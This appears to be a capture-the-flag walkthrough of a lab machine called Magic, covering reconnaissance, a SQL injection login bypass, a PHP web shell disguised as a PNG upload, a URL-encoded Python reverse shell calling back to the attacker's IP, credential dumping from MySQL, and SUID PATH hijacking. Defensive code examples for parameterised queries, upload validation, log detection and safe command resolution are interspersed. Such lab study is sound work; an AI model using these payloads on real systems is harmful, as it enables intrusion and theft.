Information Gathering

| IP Address | Open Ports |
|---|---|
| 10.10.10.185 | TCP: 22, 80 |
$ nmap -p- 10.10.10.185 --min-rate 1000 -sC -sV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
| 256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_ 256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Magic Portfolio
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
SQLi & File Upload
$ gobuster dir -u 'http://10.10.10.185/' -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -b 403,404 -x php,txt,html
The Apache 2.4.x middleware is affected by an "upward" (right-to-left) extension-parsing weakness.
http://10.10.10.185/login.php
username:admin' or '1'='1
password:xxxx
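The login bypass above works because the username is spliced into the SQL text. The following added example (mine, not code from the writeup or the Magic box; the table name and the stored password are constructed stand-ins, since the real schema is not on the page) uses an in-memory SQLite table to show the concatenated query accepting `admin' or '1'='1` and the parameterised query rejecting it:

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed stand-in for the application's login table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login (username TEXT, password TEXT)")
    conn.execute("INSERT INTO login VALUES ('admin', 'correct-horse')")
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # String concatenation: the quote in the username closes the literal and
    # the rest of the input becomes SQL. With the payload from the writeup the
    # WHERE clause becomes  username='admin' OR ('1'='1' AND password='xxxx'),
    # which is true for the admin row regardless of the password.
    query = ("SELECT COUNT(*) FROM login WHERE username='" + username
             + "' AND password='" + password + "'")
    return conn.execute(query).fetchone()[0] > 0


def safe_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Bound parameters: the driver sends the values separately from the SQL,
    # so quotes inside them are plain data and the payload matches no row.
    row = conn.execute(
        "SELECT COUNT(*) FROM login WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] > 0


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", vulnerable_login(db, "admin' or '1'='1", "xxxx"))  # True
    print("safe:      ", safe_login(db, "admin' or '1'='1", "xxxx"))        # False
```

The same split applies to the PHP login.php on the box: PDO or mysqli prepared statements with placeholders behave like `safe_login`, while any query built with string interpolation behaves like `vulnerable_login`.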
Upload the file
POST /upload.php HTTP/1.1
Host: 10.10.10.185
Content-Length: 365
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.10.185
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryRSRyaClLcBoHRDRp
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.10.10.185/upload.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=ld7t5k74b1gjfaaevqcu33hcu5
Connection: close

------WebKitFormBoundaryRSRyaClLcBoHRDRp
Content-Disposition: form-data; name="image"; filename="Screenshot_2024-08-08_08_28_47.php.png"
Content-Type: image/png

‰PNG<?php system($_GET['cmd']); phpinfo(); ?>
------WebKitFormBoundaryRSRyaClLcBoHRDRp
Content-Disposition: form-data; name="submit"

Upload Image
------WebKitFormBoundaryRSRyaClLcBoHRDRp--
The uploaded file can be located through the image path shown on the home page.
curl 'http://10.10.10.185/images/uploads/Screenshot_2024-08-08_08_28_46.php.png?cmd=python3+-c+%27import+socket%2csubprocess%2cos%3bs%3dsocket.socket(socket.AF_INET%2csocket.SOCK_STREAM)%3bs.connect((%2210.10.16.24%22%2c10034))%3bos.dup2(s.fileno()%2c0)%3b+os.dup2(s.fileno()%2c1)%3bos.dup2(s.fileno()%2c2)%3bimport+pty%3b+pty.spawn(%22%2fbin%2fbash%22)%27'
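The upload is accepted because the server only looks at the last extension and the first few bytes, and the file is then executed because Apache honours the `.php` segment earlier in the name. The following added example (mine, not code from the writeup or the Magic application; the upload directory, the log lines and the allowed-type table are constructed assumptions) shows an upload validator that rejects any script extension anywhere in the name, requires the full 8-byte PNG signature rather than the 4 bytes `‰PNG`, and refuses embedded PHP tags, plus a detector that scans Apache access-log lines for requests that serve a `.php.*` file out of the upload directory:

```python
import os
import re

# Full image signatures; the writeup's payload only carries the first 4 PNG bytes.
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
JPEG_MAGIC = b"\xff\xd8\xff"
ALLOWED = {"png": PNG_MAGIC, "jpg": JPEG_MAGIC, "jpeg": JPEG_MAGIC}  # assumed policy
# Extensions Apache/mod_php may hand to the PHP engine (assumed list; match your AddHandler).
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar"}
UPLOAD_PREFIX = "/images/uploads/"  # taken from the path used in the writeup


def validate_upload(filename: str, data: bytes):
    """Return (accepted, reason) for a candidate upload."""
    base = os.path.basename(filename)
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "no extension"
    exts = parts[1:]
    # Apache evaluates every extension, so x.php.png is still handled as PHP.
    if any(e in SCRIPT_EXTS for e in exts):
        return False, "script extension present: " + base
    if len(exts) > 1:
        return False, "multiple extensions: " + base
    ext = exts[0]
    if ext not in ALLOWED:
        return False, "extension not allowed: " + ext
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not match extension"
    if b"<?php" in data or b"<?=" in data:
        return False, "embedded PHP tag"
    return True, "ok"


REQ_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>[^ "]+) HTTP/')


def flag_upload_exec(log_lines):
    """Return (path, query) for requests serving a script-extension file from the upload dir."""
    hits = []
    for line in log_lines:
        m = REQ_LINE.search(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        if not path.startswith(UPLOAD_PREFIX):
            continue
        name = path.rsplit("/", 1)[-1]
        if any(e in SCRIPT_EXTS for e in name.lower().split(".")[1:]):
            hits.append((path, query))
    return hits


# Constructed access-log sample modelled on the writeup's requests.
SAMPLE_LOG = [
    '10.10.16.24 - - [08/Aug/2024:08:28:50 +0000] "POST /upload.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '10.10.16.24 - - [08/Aug/2024:08:29:01 +0000] "GET /images/uploads/Screenshot_2024-08-08_08_28_46.php.png?cmd=id HTTP/1.1" 200 512 "-" "curl/8.0"',
    '10.10.16.24 - - [08/Aug/2024:08:30:12 +0000] "GET /images/uploads/holiday.png HTTP/1.1" 200 20481 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(validate_upload("Screenshot_2024-08-08_08_28_47.php.png", b"\x89PNG<?php system($_GET['cmd']); ?>"))
    print(validate_upload("holiday.png", PNG_MAGIC + b"\x00" * 16))
    print(flag_upload_exec(SAMPLE_LOG))
```

Extension and signature checks are only the first layer: storing uploads under a server-generated name and serving the upload directory with the PHP engine disabled (`php_admin_flag engine off` in that directory's Apache configuration) removes the execution path even if a check is bypassed.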
Skipping Ahead & TRP00F
Fortunately, TRP00F can be used to skip this stage and go straight from the www user to root.
https://github.com/MartinxMax/trp00f
$ python3 trp00f.py --lhost 10.10.16.24 --lport 10011 --rhost 10.10.16.24 --rport 10035 --http 9999
www-data to theseus
$ cat /var/www/Magic/db.php5
username:theseus
password:iamkingtheseus
Forward port 3306 with chisel
$ mysql -h 127.0.0.1 -utheseus -p
MySQL [Magic]> select * from Magic.login;
password:Th3s3usW4sK1ng
$ su theseus
User.txt
0f8c7dc6b4de6fc370a9d193350ce15c
Privilege Escalation
$ find / -perm -4000 -type f 2>/dev/null
$ strings /bin/sysinfo
Environment Variable (PATH) Hijacking
theseus@magic:~$ echo '/bin/bash'>/tmp/cat;chmod +x /tmp/cat
theseus@magic:~$ export PATH=/tmp:$PATH
theseus@magic:~$ sysinfo
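The escalation works because the SUID `sysinfo` binary resolves `cat` through the caller's PATH. The following added example (mine, not code from the writeup or the box; the trusted directory list and the temporary fake `cat` are constructed for the demonstration) contrasts a resolver that trusts the inherited PATH with one that searches a fixed list only, and shows how a privileged helper should invoke external commands with a clean environment:

```python
import os
import stat
import subprocess
import tempfile

# Fixed search path a privileged helper should use (assumed; adjust to the host).
TRUSTED_PATH = ("/usr/bin", "/bin")


def resolve(command, path_dirs):
    """Return the first executable regular file named `command` in path_dirs, or None."""
    for d in path_dirs:
        candidate = os.path.join(d, command)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def resolve_inherited(command, path_env):
    # What system("cat ...") in a SUID binary effectively does: trust the caller's PATH.
    return resolve(command, path_env.split(os.pathsep))


def resolve_trusted(command):
    # Hardened: ignore the environment and search only the fixed list.
    return resolve(command, TRUSTED_PATH)


def run_trusted(command, *args):
    """Run a command by absolute path with a minimal environment."""
    exe = resolve_trusted(command)
    if exe is None:
        raise FileNotFoundError(command)
    return subprocess.run(
        [exe, *args],
        env={"PATH": os.pathsep.join(TRUSTED_PATH)},
        capture_output=True, text=True, check=True,
    )


def demo():
    """Simulate the writeup's /tmp/cat in a private temp dir and compare both resolvers.

    Returns (naive_picked_fake, trusted_never_picked_fake).
    """
    with tempfile.TemporaryDirectory() as tmp:
        fake = os.path.join(tmp, "cat")  # constructed stand-in for /tmp/cat
        with open(fake, "w") as f:
            f.write("#!/bin/sh\necho fake\n")
        os.chmod(fake, os.stat(fake).st_mode | stat.S_IXUSR)
        # PATH as set in the writeup: the writable directory first.
        attacker_path = tmp + os.pathsep + os.pathsep.join(TRUSTED_PATH)
        naive = resolve_inherited("cat", attacker_path)
        hardened = resolve_trusted("cat")
        return naive == fake, hardened is None or not hardened.startswith(tmp)


if __name__ == "__main__":
    print(demo())  # (True, True)
```

For a native SUID binary the equivalent fix is to call the helper by absolute path (or via `execve` with an explicit, minimal `envp`) instead of `system()`, and to drop privileges before running anything that is not strictly required to be root.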
Root.txt
9f8904b0558514cb9b60c6c6985dddbd